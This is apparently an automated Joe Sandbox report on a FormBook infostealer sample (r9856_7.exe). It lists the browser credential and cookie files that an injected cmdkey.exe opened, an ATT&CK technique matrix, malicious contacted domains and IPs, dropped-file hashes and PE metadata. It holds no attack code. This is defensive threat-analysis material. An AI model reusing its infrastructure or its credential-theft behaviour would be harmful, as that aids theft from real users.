            Source: C:\Windows\SysWOW64\cmdkey.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\cmdkey.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\cmdkey.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\cmdkey.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\cmdkey.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\cmdkey.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match, File source: 4.2.r9856_7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.2.r9856_7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.1545185374.0000000001500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3816533297.0000000003160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.1545720101.0000000002060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
            [Behavior graph: ID 1509673, Sample: r9856_7.exe, Startdate: 11/09/2024, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            r9856_7.exe | 63% | ReversingLabs | Win32.Backdoor.FormBook |
            r9856_7.exe | 100% | Avira | TR/AD.Swotter.whnvz |
            r9856_7.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                              unknown
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.chinaen.org/lol/200.htmlcmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.chinaen.org/lol/201.htmlcmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.htmlit.com.cn/cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://js.users.51.la/21851687.jscmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://i1.cdn-image.com/__media__/pics/28903/search.png)cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://delivery.consentmanager.netcmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.hiretemp.net/sk-logabpstatus.php?a=azI2OHRXUHVzMTBzQXZ5ektDRlFPdm5kMWRrSHFZcXJyR0pab3RFT2cmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.hiretemp.net/display.cfmcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icocmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.chinaen.org/zb_users/theme/yd1125free/script/custom.js?v=1.2.4cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.chinaen.org/lol/195.htmlcmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.chinaen.org/lol/203.htmlcmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.3.3.min.csscmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.zblogcn.com/cmdkey.exe, 00000008.00000002.3818027240.0000000005642000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000004ED2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://ac.ecosia.org/autocomplete?q=cmdkey.exe, 00000008.00000003.1737146013.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a5.htmlcmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffcmdkey.exe, 00000008.00000002.3820042954.0000000006490000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3818027240.000000000468E000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003F1E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a8.htmlcmdkey.exe, 00000008.00000002.3818027240.00000000041D8000.00000004.10000000.00040000.00000000.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3817383902.0000000003A68000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              162.240.81.18
                                                              jeandreo.storeUnited States
                                                              46606UNIFIEDLAYER-AS-1UStrue
                                                              162.0.213.94
                                                              www.zimra.xyzCanada
                                                              35893ACPCAtrue
                                                              76.223.113.161
                                                              justlivn.netUnited States
                                                              16509AMAZON-02UStrue
                                                              84.32.84.32
                                                              legitima.legalLithuania
                                                              33922NTT-LT-ASLTtrue
                                                              199.59.243.226
                                                              www.personal-loans-jp8.xyzUnited States
                                                              395082BODIS-NJUStrue
                                                              154.23.184.218
                                                              57ddu.topUnited States
                                                              174COGENT-174UStrue
                                                              208.91.197.13
                                                              www.hiretemp.netVirgin Islands (BRITISH)
                                                              40034CONFLUENCE-NETWORK-INCVGtrue
                                                              65.108.194.49
                                                              maya24.xyzUnited States
                                                              11022ALABANZA-BALTUStrue
                                                              152.53.38.0
                                                              nuv3.topUnited States
                                                              81NCRENUStrue
                                                              188.114.96.3
                                                              www.chinaen.orgEuropean Union
                                                              13335CLOUDFLARENETUStrue
                                                              23.225.34.75
                                                              www.bashei.topUnited States
                                                              40065CNSERVERSUStrue
                                                              172.67.221.5
                                                              www.hemistryb.onlineUnited States
                                                              13335CLOUDFLARENETUStrue
                                                              3.33.130.190
                                                              tigre777gg.onlineUnited States
                                                              8987AMAZONEXPANSIONGBtrue
                                                              35.214.33.204
                                                              www.autochemtools.comUnited States
                                                              19527GOOGLE-2UStrue
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1509673
Start date and time: 2024-09-11 22:53:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: r9856_7.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@11/7@18/14
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 92
• Number of non-executed functions: 280
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.95.65.251, 40.119.6.228
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: r9856_7.exe
Time | Type | Description
16:54:14 | API Interceptor | 1x Sleep call for process: r9856_7.exe modified
16:54:16 | API Interceptor | 11x Sleep call for process: powershell.exe modified
16:55:09 | API Interceptor | 12614966x Sleep call for process: cmdkey.exe modified
                                                              UNIFIEDLAYER-AS-1USPlay_VM-Now(Michelle.axmaker)CLQD.htmlGet hashmaliciousUnknownBrowse
                                                              • 192.185.13.172
                                                              Play_VM-Now(Atomicdata)CLQD.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 108.167.172.137
                                                              https://docs.google.com/drawings/d/1XTtg4o4D3rVDatT-1eTIZjr2WQ95puAA8jccViOFGvQ/preview?jv22tGet hashmaliciousUnknownBrowse
                                                              • 162.240.156.181
                                                              https://www.google.com/url?q=https://www.google.com/url?q%3DdCSMjVnvsqsqaP8pEWWm%26rct%3DSpPq9HncUaCXUtCZusX0%26sa%3Dt%26esrc%3DuZR6jk9A67Rj7RZhLuPE%26source%3D%26cd%3Deh0xIKCKpKh7i4kTt26p%26cad%3DVEVtMkQKVNr1KW4fxShi%26ved%3DNTDACygNXetEDbRT8YiY%26uact%3D%2520%26url%3Damp%252Fne%C2%ADby%C2%ADco%C2%ADm%E2%80%8B.%C2%ADc%C2%ADo%C2%ADm%E2%80%8B/dayo/iAlZHZ/ZGF2aWQuai5tZWxzbmVzc0B4Y2VsZW5lcmd5LmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                              • 162.240.102.206
                                                              SUSPECT-Caller left VM MSG 000130 DURATION-130d59604ceef43a4732c50b34e3444d (23.1 KB).msgGet hashmaliciousPhisherBrowse
                                                              • 192.185.13.186
                                                              Play_VM-Now(Gracehealthmi)CLQD.htmlGet hashmaliciousUnknownBrowse
                                                              • 162.241.24.122
                                                              Remittance AdviceNote c6b2e2a43485b7b75999a5332e86646fGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                              • 69.49.245.172
                                                              Play____Now(Stewart.b)a2f1c0d5349d3a3f5a8836dc306214787325a135.htmGet hashmaliciousHTMLPhisherBrowse
                                                              • 69.49.245.172
                                                              Play____Now(Stewart.b)a2f1c0d5349d3a3f5a8836dc306214787325a135.htmGet hashmaliciousHTMLPhisherBrowse
                                                              • 69.49.245.172
                                                              https://url.za.m.mimecastprotect.com/s/0BCLC2RJJxsopvqJcnfRC5V8Fi?domain=form.asana.comGet hashmaliciousUnknownBrowse
                                                              • 50.87.253.62
                                                              ACPCA8097600987765.exeGet hashmaliciousFormBookBrowse
                                                              • 162.0.213.72
                                                              PO#86637.exeGet hashmaliciousFormBookBrowse
                                                              • 162.0.213.94
                                                              QOaboeP8al.exeGet hashmaliciousDarkCloudBrowse
                                                              • 162.55.60.2
                                                              Request for Quotataion.exeGet hashmaliciousDarkCloudBrowse
                                                              • 162.55.60.2
                                                              New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                              • 162.0.213.94
                                                              Scan 00093847.exeGet hashmaliciousFormBookBrowse
                                                              • 162.0.213.94
                                                              Play_VM-NowMarge.mcintireAudiowav012.htmlGet hashmaliciousPhisherBrowse
                                                              • 162.0.217.108
                                                              Play_VM-NowMarge.mcintireAudiowav012.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 162.0.217.108
                                                              Play_VM-NowMarge.mcintireAudiowav012.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 162.0.217.108
                                                              Factura de proforma.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                              • 162.0.213.72
                                                              No context
                                                              No context
                                                              Process:C:\Users\user\Desktop\r9856_7.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1216
                                                              Entropy (8bit):5.34331486778365
                                                              Encrypted:false
                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):2232
                                                              Entropy (8bit):5.379736180876081
                                                              Encrypted:false
                                                              SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:tLHyIFKL3IZ2KRH9Oug8s
                                                              MD5:AE33CC731D64A142DFCC6A541D0708FC
                                                              SHA1:31B0ECD28CA8892C3EF4B42D1CB1F56BECD14BEA
                                                              SHA-256:776FC4031835093845318CEABF43AB13C51EC6CA69B985C45049EAE2EB6AF623
                                                              SHA-512:5282E64561D28CB77C92089BEAF27D83EC55B2A673BEF6EAB4DFC49BE61A0F6653E73F07A45AFBF93C407546D04BB50D9690CCBF553227A4E6CFE4F98389C211
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                              Process:C:\Windows\SysWOW64\cmdkey.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                              Category:modified
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.1215420383712111
                                                              Encrypted:false
                                                              SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                              MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                              SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                              SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                              SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                              Malicious:false
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.852357656519757
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Windows Screen Saver (13104/52) 0.07%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              File name:r9856_7.exe
                                                              File size:712'192 bytes
                                                              MD5:6abb344635c64e538866f0e7386e2568
                                                              SHA1:072c594929e33401604f6e4f184f2ed78b4e38c2
                                                              SHA256:a5273ce78432a8f34e120ecd96da8681ece96ce8b54cc6eec68c0088c483b8ec
                                                              SHA512:eb02a89ec96410c5f96b03d2222ce2f1553a90e763d09f0f08a26e9e2e98089b31f4526273797b5631260250e00e40e1529618eba1b4458f7b1873cf286ef923
                                                              SSDEEP:12288:XO0WTavnxRpFrt/0hi9cDoxsxrHWpH6MMGD1TmWqSokzT9i72l:DWGpRTrii9ccx4r2t6MMGD1crIkE
                                                              TLSH:C0E41269A629C811E95843380671C3B14B3D7F9AE111D30B8FEFACF77856378B924792
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~U...............0.............".... ........@.. .......................@............@................................
                                                              Icon Hash:00928e8e8686b000
                                                              Entrypoint:0x4af022
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0xD9557E98 [Wed Jul 18 01:40:40 2085 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xaefcf | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x64c | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb2000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xad064 | 0x70 | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
